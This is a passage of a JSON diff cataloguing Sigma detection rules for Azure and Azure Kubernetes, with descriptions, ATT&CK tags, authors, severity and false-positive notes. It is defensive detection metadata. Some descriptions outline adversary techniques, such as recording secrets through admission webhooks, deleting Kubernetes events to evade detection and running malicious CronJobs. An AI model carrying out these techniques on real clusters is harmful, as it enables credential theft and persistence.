Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "level": "high", + "falsepositive": [ + "When and administrator is making legitimate URI configuration changes to an application. This should be a planned event." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when an account is disabled or blocked for sign in but tried to log in", + "uuid": "4afac85c-224a-4dd7-b1af-8da40e1c60bd", + "value": "Account Disabled or Blocked for Sign in Attempts", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_blocked_account_attempt.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2022/06/17", + "filename": "azure_blocked_account_attempt.yml", + "author": "Yochana Henderson, '@Yochana-H'", + "level": "medium", + "falsepositive": [ + "Account disabled or blocked in error", + "Automation account has been blocked or disabled" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access.", + "uuid": "4d78a000-ab52-4564-88a5-7ab5242b20c7", + "value": "Change to Authentication Method", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_change_to_authentication_method.yml" + ], + "tags": [ + "attack.credential_access" + ], + "creation_date": "2021/10/10", + "filename": "azure_change_to_authentication_method.yml", + "author": "AlertIQ", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Define a baseline threshold for failed sign-ins due to Conditional Access failures", + "uuid": "b4a6d707-9430-4f5f-af68-0337f52d5c42", + "value": "Sign-in Failure Due to Conditional Access Requirements Not Met", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_conditional_access_failure.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2022/06/01", + "filename": "azure_conditional_access_failure.yml", + "author": "Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "Service Account misconfigured", + "Misconfigured Systems", + "Vulnerability Scanners" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a Container Registry is created or deleted.", + "uuid": "93e0ef48-37c8-49ed-a02c-038aab23628e", + "value": "Azure Container Registry Created or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/07", + "filename": "azure_container_registry_created_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Number of VM creations or deployment activities occur in Azure via the azureactivity log.", + "uuid": "d2d901db-7a75-45a1-bc39-0cbf00812192", + "value": "Number Of Resource Creation Or Deployment Activities", + "meta": { + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_creating_number_of_resources_detection.yml" + ], + "tags": [ + "attack.t1098" + ], + "creation_date": "2020/05/07", + "filename": "azure_creating_number_of_resources_detection.yml", + "author": "sawwinnnaung", + "level": "medium", + "falsepositive": [ + "Valid change" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a device in azure is no longer managed or compliant", + "uuid": "542b9912-c01f-4e3f-89a8-014c48cdca7d", + "value": "Azure Device No Longer Managed or Compliant", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/03", + "filename": "azure_device_no_longer_managed_or_compliant.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Administrator may have forgotten to review the device." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a device or device configuration in azure is modified or deleted.", + "uuid": "46530378-f9db-4af9-a9e5-889c177d3881", + "value": "Azure Device or Configuration Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/03", + "filename": "azure_device_or_configuration_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Device or device configuration being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when DNS zone is modified or deleted.", + "uuid": "af6925b0-8826-47f1-9324-337507a0babd", + "value": "Azure DNS Zone Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_dns_zone_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when an user or application modified the federation settings on the domain.", + "uuid": "352a54e1-74ba-4929-9d47-8193d67aba1e", + "value": "Azure Domain Federation Settings Modified", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1078", + "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_federation_modified.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2021/09/06", + "filename": "azure_federation_modified.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Federation Settings being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a firewall is created, modified, or deleted.", + "uuid": "512cf937-ea9b-4332-939c-4c2c94baadcd", + "value": "Azure Firewall Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_firewall_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.", + "uuid": "025c9fe7-db72-49f9-af0d-31341dd7dd57", + "value": "Azure Firewall Rule Collection Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/08", + "filename": "azure_firewall_rule_collection_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", + "uuid": "a622fcd2-4b5a-436a-b8a2-a4171161833c", + "value": "Granting Of Permissions To An Account", + "meta": { + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_granting_permission_detection.yml" + ], + "tags": [ + "attack.t1098" + ], + "creation_date": "2020/05/07", + "filename": "azure_granting_permission_detection.yml", + "author": "sawwinnnaung", + "level": "medium", + "falsepositive": [ + "Valid change" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert on group membership additions of groups that have CA policy modification access", + "uuid": "91c95675-1f27-46d0-bead-d1ae96b97cd3", + "value": "User Added To Group With CA Policy Modification Access", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_addition_ca_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2022/08/04", + "filename": "azure_group_user_addition_ca_modification.yml", + "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", + "level": "medium", + "falsepositive": [ + "User removed from the group is approved" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert on group membership removal of groups that have CA policy modification access", + "uuid": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", + "value": "User Removed From Group With CA Policy Modification Access", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_removal_ca_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2022/08/04", + "filename": "azure_group_user_removal_ca_modification.yml", + "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", + "level": "medium", + "falsepositive": [ + "User removed from the group is approved" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.", + "uuid": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", + "value": "Guest User Invited By Non Approved Inviters", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_invite_failure.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/08/10", + "filename": "azure_guest_invite_failure.yml", + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "level": "medium", + "falsepositive": [ + "A non malicious user is unaware of the proper process" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.", + "uuid": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", + "value": "User State Changed From Guest To Member", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_to_member.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/06/30", + "filename": "azure_guest_to_member.yml", + "author": "MikeDuddington, '@dudders1'", + "level": "medium", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Keyvault Key is modified or deleted in Azure.", + "uuid": "80eeab92-0979-4152-942d-96749e11df40", + "value": "Azure Keyvault Key Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ], + "creation_date": "2021/08/16", + "filename": "azure_keyvault_key_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Key being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a key vault is modified or deleted.", + "uuid": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", + "value": "Azure Key Vault Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ], + "creation_date": "2021/08/16", + "filename": "azure_keyvault_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Key Vault being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when secrets are modified or deleted in Azure.", + "uuid": "b831353c-1971-477b-abb6-2828edc3bca1", + "value": "Azure Keyvault Secrets Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ], + "creation_date": "2021/08/16", + "filename": "azure_keyvault_secrets_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Secrets being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when an admission controller is executed in Azure Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\nAn adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", + "uuid": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", + "value": "Azure Kubernetes Admission Controller", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_admission_controller.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1078", + "attack.credential_access", + "attack.t1552", + "attack.t1552.007" + ], + "creation_date": "2021/11/25", + "filename": "azure_kubernetes_admission_controller.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Azure Kubernetes Admissions Controller may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a Azure Kubernetes Cluster is created or deleted.", + "uuid": "9541f321-7cba-4b43-80fc-fbd1fb922808", + "value": "Azure Kubernetes Cluster Created or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/07", + "filename": "azure_kubernetes_cluster_created_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "low", + "falsepositive": [ + "Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "uuid": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", + "value": "Azure Kubernetes CronJob", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.execution" + ], + "creation_date": "2021/11/22", + "filename": "azure_kubernetes_cronjob.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Azure Kubernetes CronJob/Job may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", + "uuid": "225d8b09-e714-479c-a0e4-55e6f29adf35", + "value": "Azure Kubernetes Events Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562", + "attack.t1562.001" + ], + "creation_date": "2021/07/24", + "filename": "azure_kubernetes_events_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Azure Kubernetes network policy is modified or deleted.", + "uuid": "08d6ac24-c927-4469-b3b7-2e422d6e3c43", + "value": "Azure Kubernetes Network Policy Change", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access" + ], + "creation_date": "2021/08/07", + "filename": "azure_kubernetes_network_policy_change.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies the deletion of Azure Kubernetes Pods.", + "uuid": "b02f9591-12c3-4965-986a-88028629b2e1", + "value": "Azure Kubernetes Pods Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/07/24", + "filename": "azure_kubernetes_pods_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.", + "uuid": "25cb259b-bbdc-4b87-98b7-90d7c72f8743", + "value": "Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access" + ], + "creation_date": "2021/08/07", + "filename": "azure_kubernetes_rolebinding_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when ClusterRoles/Roles are being modified or deleted.", + "uuid": "818fee0c-e0ec-4e45-824e-83e4817b0887", + "value": "Azure Kubernetes Sensitive Role Access", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/07", + "filename": "azure_kubernetes_role_access.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.", + "uuid": "7ee0b4aa-d8d4-4088-b661-20efdf41a04c", + "value": "Azure Kubernetes Secret or Config Object Access", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/07", + "filename": "azure_kubernetes_secret_or_config_object_access.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a service account is modified or deleted.", + "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2", + "value": "Azure Kubernetes Service Account Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/07", + "filename": "azure_kubernetes_service_account_modified_or_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Alert on when legecy authentication has been used on an account", + "uuid": "60f6535a-760f-42a9-be3f-c9a0a025906e", + "value": "Use of Legacy Authentication Protocols", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_legacy_authentication_protocols.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ], + "creation_date": "2022/06/17", + "filename": "azure_legacy_authentication_protocols.yml", + "author": "Yochana Henderson, '@Yochana-H'", + "level": "high", + "falsepositive": [ + "User has been put in acception group so they can use legacy authentication" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect failed attempts to sign in to disabled accounts.", + "uuid": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", + "value": "Login to Disabled Account", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_login_to_disabled_account.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ], + "creation_date": "2021/10/10", + "filename": "azure_login_to_disabled_account.yml", + "author": "AlertIQ", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.", + "uuid": "e40f4962-b02b-4192-9bfe-245f7ece1f99", + "value": "Multifactor Authentication Denied", + "meta": { + "refs": [ + 